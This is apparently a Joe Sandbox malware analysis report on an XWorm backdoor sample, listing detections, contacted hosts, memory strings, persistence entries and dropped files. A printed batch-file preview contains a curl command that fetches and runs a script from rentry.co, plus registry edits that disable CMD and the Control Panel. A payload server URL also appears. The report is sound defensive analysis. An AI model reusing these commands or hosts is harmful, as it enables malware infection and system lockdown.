Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Services File Permissions Weakness	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
nkYzjyrKYK.exe	55%	ReversingLabs	Win32.Backdoor.XWorm
nkYzjyrKYK.exe	100%	Avira	TR/Redcap.iwhfv
nkYzjyrKYK.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
rentry.co	104.26.3.16	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.254.97.190:2024/download/XClient.exe	false		unknown
https://rentry.co/i7zgdqy6/raw/	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.254.97.190:2024/download/XClient.exeL	powershell.exe, 00000023.00000002.2705174795.000002C799FB0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.254.97.190:2024/download/XClient.exeLOCALAPPDATAM	powershell.exe, 0000001E.00000002.2506657477.000002A9D4041000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000019.00000002.2362998078.0000021EAE89E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2490759240.000002A9CB86E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2647393715.000001FE7305E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2847319683.000002C7ABCDC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000023.00000002.2718284212.000002C79BE99000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000019.00000002.2338794163.0000021E9EA5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2415344065.000002A9BBA29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2548374965.000001FE63219000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2718284212.000002C79BE99000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.micF1	powershell.exe, 0000001E.00000002.2503147412.000002A9D3F49000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000023.00000002.2718284212.000002C79BE99000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://185.254.97.190:2024/download/XClient.execN	curl.exe, 00000012.00000002.2298553951.00000166B8E68000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.micom/pkiops/Docs/ry.htm0	powershell.exe, 00000019.00000002.2374337905.0000021EB6D5A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2670965885.000001FE7B692000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.microsoft.co	powershell.exe, 00000022.00000002.2670965885.000001FE7B712000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 00000023.00000002.2847319683.000002C7ABCDC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.mic	powershell.exe, 00000023.00000002.2873253607.000002C7B426E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/Icon	powershell.exe, 00000023.00000002.2847319683.000002C7ABCDC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://rentry.co/i7zgdqy6/raw/Winsta0	curl.exe, 00000007.00000002.2181282531.000001B169840000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.254.97.190:2024/download/XClient.exeD	powershell.exe, 00000019.00000002.2372968248.0000021EB6C60000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 00000023.00000002.2718284212.000002C79BE99000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://185.254.97.190:2024/download/XClient.exeK	powershell.exe, 0000001E.00000002.2411777795.000002A9B9B87000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://rentry.co/i7zgdqy6/raw/5	curl.exe, 00000007.00000003.2181061378.000001B169857000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.2180548349.000001B169854000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.2181317822.000001B169857000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://rentry.co/i7zgdqy6/raw/curl	curl.exe, 00000007.00000002.2181282531.000001B169840000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.254.97.190:2024/downm	curl.exe, 00000012.00000002.2298553951.00000166B8E71000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.254.97.190:2024/downl	powershell.exe, 0000001E.00000002.2503147412.000002A9D3ECC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.254.97.190:2024/download/XClient.exe2	curl.exe, 00000012.00000002.2298553951.00000166B8E68000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2337641915.0000021E9CCB8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.254.97.190:2024/download/XClient.exeLOCALAPPDATA=C:	powershell.exe, 00000019.00000002.2375708119.0000021EB70A2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2374337905.0000021EB6D0E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2376447259.0000021EB714C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2338258747.0000021E9CF44000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2413515102.000002A9B9DC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2503147412.000002A9D3F49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2502351134.000002A9D3BFE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2413515102.000002A9B9DC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2413938120.000002A9BB660000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2411777795.000002A9B9B87000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2543249790.000001FE61450000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2669344884.000001FE7B464000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2543249790.000001FE61454000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2670965885.000001FE7B6D4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2674736805.000001FE7B7F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2543484309.000001FE614C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2713234858.000002C79A134000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2713234858.000002C79A130000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2870786219.000002C7B4068000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2714839780.000002C79BA60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2873253607.000002C7B426E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.254.97.190:2024/download/XClient.exev	powershell.exe, 0000001E.00000002.2411777795.000002A9B9B87000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.254.97.190:2024/download/XClient.exe7	powershell.exe, 0000001E.00000002.2411777795.000002A9B9B87000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.254.97.190:2024/download/XClient.exey	powershell.exe, 00000023.00000002.2705174795.000002C799FB0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000019.00000002.2338794163.0000021E9EA5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2415344065.000002A9BBA29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2548374965.000001FE63219000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2718284212.000002C79BE99000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000023.00000002.2847319683.000002C7ABCDC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000019.00000002.2362998078.0000021EAE89E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2490759240.000002A9CB86E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2647393715.000001FE7305E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2847319683.000002C7ABCDC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.254.97.190:2024/download/XClient.exe:	curl.exe, 00000012.00000002.2298553951.00000166B8E68000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://rentry.co/i7zgdqy6/raw/P	curl.exe, 00000007.00000002.2181352575.000001B16987B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.2180410147.000001B16987A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.micft.cMicRosof	powershell.exe, 00000023.00000002.2873253607.000002C7B426E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore68	powershell.exe, 00000019.00000002.2338794163.0000021E9E831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2415344065.000002A9BB801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2548374965.000001FE62FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2718284212.000002C79BC87000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.254.97.190:2024/download/XClient.exed	powershell.exe, 00000022.00000002.2543673208.000001FE61521000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000019.00000002.2338794163.0000021E9E831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2415344065.000002A9BB801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2548374965.000001FE62FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2718284212.000002C79BC87000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.254.97.190:2024/down	curl.exe, 00000012.00000002.2298553951.00000166B8E71000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.254.97.190:2024/download/XClient.exe)	curl.exe, 00000012.00000002.2298553951.00000166B8E71000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
8.8.8.8	unknown	United States	15169	GOOGLEUS	false
104.26.3.16	rentry.co	United States	13335	CLOUDFLARENETUS	true
185.254.97.190	unknown	Germany	60548	AVORODE	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1533955
Start date and time:	2024-10-15 11:25:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	37
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	nkYzjyrKYK.exe renamed because original name is a hash value
Original Sample Name:	0f5582439a6cf97fdbc8a7c0037d8ed10ce639c982cd433b83dd4159017fbe62.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@55/34@1/4
EGA Information:	Successful, ratio: 20%
HCA Information:	Successful, ratio: 100% Number of executed functions: 64 Number of non-executed functions: 58
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, VSSVC.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 2432 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5648 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5776 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6684 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: nkYzjyrKYK.exe

Simulations

Behavior and APIs

Time	Type	Description
05:26:10	API Interceptor	72x Sleep call for process: powershell.exe modified
05:26:48	API Interceptor	11475507x Sleep call for process: nkYzjyrKYK.exe modified
11:26:20	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run windows-app lsass.exe
11:26:21	Task Scheduler	Run new task: Windows Service path: lsass.exe
11:26:21	Task Scheduler	Run new task: winlogon path: lsass.exe
11:26:29	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run windows-app lsass.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.3.16	R6IuO0fzec.exe	Get hash	malicious	Python Stealer, CStealer	Browse
	FluxusV2.exe	Get hash	malicious	Python Stealer, CStealer	Browse
	egFMhHSlmf.exe	Get hash	malicious	Xmrig	Browse
	SecuriteInfo.com.Win64.TrojanX-gen.20834.9882.exe	Get hash	malicious	Unknown	Browse
	4wx72yFLka.exe	Get hash	malicious	Python Stealer, CStealer, Chaos	Browse
	quotation.js	Get hash	malicious	Unknown	Browse
	Quote.js	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.9087.16441.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.11541.5330.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.9087.16441.exe	Get hash	malicious	Unknown	Browse
185.254.97.190	0vEj9ws1C4.exe	Get hash	malicious	Unknown	Browse	185.254.97.190:2024/download/ey341.exe
185.254.97.190	hzUKkzHBqd.ps1	Get hash	malicious	Unknown	Browse	185.254.97.190:4001/download/rege.zip

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
rentry.co	r8k29DBraE.exe	Get hash	malicious	XWorm	Browse	104.26.2.16
	Q1KaSJ8Fom.exe	Get hash	malicious	Unknown	Browse	172.67.75.40
	hzUKkzHBqd.ps1	Get hash	malicious	Unknown	Browse	104.26.2.16
	MVgsmZoDvQ.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	172.67.75.40
	hQI2tssFc0.exe	Get hash	malicious	Unknown	Browse	104.26.2.16
	Q1KaSJ8Fom.exe	Get hash	malicious	Unknown	Browse	104.26.2.16
	cs.exe	Get hash	malicious	Python Stealer, CStealer	Browse	172.67.75.40
	R6IuO0fzec.exe	Get hash	malicious	Python Stealer, CStealer	Browse	104.26.3.16
	FluxusV2.exe	Get hash	malicious	Python Stealer, CStealer	Browse	104.26.3.16
	egFMhHSlmf.exe	Get hash	malicious	Xmrig	Browse	104.26.3.16

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AVORODE	0vEj9ws1C4.exe	Get hash	malicious	Unknown	Browse	185.254.97.190
	hzUKkzHBqd.ps1	Get hash	malicious	Unknown	Browse	185.254.97.190
	1d686b05f745875e28939abe357baedd169b59f5a0d88.exe	Get hash	malicious	Quasar	Browse	193.42.11.9
	8cf0382f7f56bc86f6d5cf41a76b23d0cbc64dacf467b.exe	Get hash	malicious	Unknown	Browse	193.42.11.9
	8cf0382f7f56bc86f6d5cf41a76b23d0cbc64dacf467b.exe	Get hash	malicious	Unknown	Browse	193.42.11.9
	SecuriteInfo.com.Win64.MalwareX-gen.1457.25976.exe	Get hash	malicious	Unknown	Browse	185.254.97.173
	file.exe	Get hash	malicious	LummaC, Babuk, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoader	Browse	45.152.46.72
	wsr3iUW0I0.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer	Browse	45.152.46.72
	nL4rzMSCVd.elf	Get hash	malicious	Mirai	Browse	185.254.97.237
	m5EyzJ7S8S.exe	Get hash	malicious	Amadey, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Stealc, Vidar	Browse	185.254.96.139
CLOUDFLARENETUS	r8k29DBraE.exe	Get hash	malicious	XWorm	Browse	104.26.2.16
	Q1KaSJ8Fom.exe	Get hash	malicious	Unknown	Browse	162.159.135.232
	hzUKkzHBqd.ps1	Get hash	malicious	Unknown	Browse	104.26.2.16
	MVgsmZoDvQ.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	172.67.75.40
	hQI2tssFc0.exe	Get hash	malicious	Unknown	Browse	104.26.2.16
	Q1KaSJ8Fom.exe	Get hash	malicious	Unknown	Browse	104.16.184.241
	lfyJfb6jSS.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	http://learnthelanguage.nl/?wptouch_switch=desktop&redirect=http://basinindustriesinc.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	http://translate.how	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://learnthelanguage.nl/?wptouch_switch=desktop&redirect=http://basinindustriesinc.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
74954a0c86284d0d6e1c4efefe92b521	0CX5vBE7nr.exe	Get hash	malicious	Babadeda, KDOT TOKEN GRABBER	Browse	104.26.3.16
	6706ad721d914_JuidePorison.exe	Get hash	malicious	Unknown	Browse	104.26.3.16
	main.bat.bin.bat	Get hash	malicious	Discord Rat	Browse	104.26.3.16
	S4dd5N5VuJ.lnk	Get hash	malicious	Unknown	Browse	104.26.3.16
	404.exe	Get hash	malicious	Unknown	Browse	104.26.3.16
	D0WmCTD2qO.bat	Get hash	malicious	Unknown	Browse	104.26.3.16
	c5WMpr1cOc.bat	Get hash	malicious	Unknown	Browse	104.26.3.16
	404.exe	Get hash	malicious	Unknown	Browse	104.26.3.16
	s14.bat	Get hash	malicious	Unknown	Browse	104.26.3.16
	s200.bat	Get hash	malicious	Unknown	Browse	104.26.3.16

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\D3B0.tmp\D3B1.tmp\D3B2.bat

Download File

Process:	C:\Users\user\Desktop\nkYzjyrKYK.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4933
Entropy (8bit):	5.03564457055396
Encrypted:	false
SSDEEP:	96:00DxULlMbMkMXrATCVO2EQ8JoYRx6DPvb:00DxUx4FwrAWO2jMxb6DL
MD5:	2C1095C588A732037777D1FFF5FEEF82
SHA1:	9F8928EAE5DDF1AD99FFBEAF1C5C3DA6A379FAB3
SHA-256:	606C9D4745F4A59A2515B333A16A98AA517C48A6B264EDD070A57DE90B7AE27B
SHA-512:	173AAA247BBABADC131950B5A42B05409B6EF96D3705E4AC611DBC28B1025E85FAC8EAD0FC8EF5DD855D175F96FE37A4B3499CA435D4B50BF02265B70C7A6149
Malicious:	true
Preview:	@shift /0..title ROOOTKIT BY vaxxer..@echo off......:internetclass....ping 8.8.8.8 -n 1 > nul......if errorlevel 1 (.. goto internetclass..) else (.. echo Internet connection is available. ..)......net session >nul 2>&1..if %errorlevel% == 0 (.. echo This script is running with administrative privileges... goto UACGoodClass..) else (.. echo This script is NOT running with administrative privileges... echo Please run this script as an administrator... goto UACErrorclass..)....:UACGoodClass..echo [%time%] UAC OK..... cd %temp%.. curl -s -o u32y.bat https://rentry.co/i7zgdqy6/raw/.. call u32y.bat.. del /q u32y.bat..........::///disable reinstall configcurations ....reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d 2 /f > nul 2>&1..reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f > nul 2>&1..reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32fd1pz3.214.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3gemlrvy.1ht.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3mbtzgvy.akr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbxfj31w.1cy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ge4dqpd4.ypt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hocpckf1.10e.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ij54nvqx.1lt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivrxe33c.5st.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jx1jspt3.xpk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
